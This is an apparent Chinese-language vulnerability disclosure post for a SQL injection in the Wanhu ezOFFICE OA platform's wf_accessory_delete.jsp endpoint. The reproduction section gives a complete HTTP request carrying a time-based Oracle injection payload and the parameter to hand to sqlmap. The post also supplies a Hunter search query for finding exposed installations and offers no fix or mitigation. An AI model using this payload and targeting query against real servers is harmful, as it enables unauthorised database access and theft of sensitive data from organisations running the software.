登录 白背景

万户协同办公平台ezoffice wf_accessory_delete 存在SQL注入漏洞

一、漏洞简介

万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户协同办公平台ezoffice wf_accessory_delete 存在SQL注入漏洞,<font style="color:rgb(62, 62, 62);">攻击者通过发送特殊的请求包可以对数据库进行SQL注入,获取服务器敏感信息。</font>

<font style="color:rgb(62, 62, 62);">二、影响版本</font>

  • <font style="color:rgb(62, 62, 62);">万户ezoffice</font>

<font style="color:rgb(62, 62, 62);">三、资产测绘</font>

  • <font style="color:rgb(62, 62, 62);">hunter</font><font style="color:rgb(62, 62, 62);">app.name="万户 Ezoffice OA"</font>
  • <font style="color:rgb(62, 62, 62);">登录页面</font>

1694241158110-8d4eef16-79f1-46eb-899b-344bd2a7a19f.png

<font style="color:rgb(62, 62, 62);">四、漏洞复现</font>

GET /defaultroot/platform/bpm/work_flow/operate/wf_accessory_delete.jsp;?wf_work_accessory_id=1+AND+2582%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2897%29%7C%7CCHR%28106%29%7C%7CCHR%28100%29%7C%7CCHR%2865%29%2C5%29 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OASESSIONID=52562B9365841755B2D1E02E88D5C06C; OASESSIONID=6E0FF3351156C2BB0306BB74100E61AF; LocLan=zh_CN
Upgrade-Insecure-Requests: 1

1706672922245-0765697f-4b7f-4af0-ab50-f67d291f5ded.png

sqlmap

/defaultroot/platform/bpm/work_flow/operate/wf_accessory_delete.jsp;?wf_work_accessory_id=1

1706672955423-5507bf9b-a333-457a-957c-3e380c02b6e7.png

原文: https://www.yuque.com/xiaokp7/ocvun2/lss5p8lokxmkblrv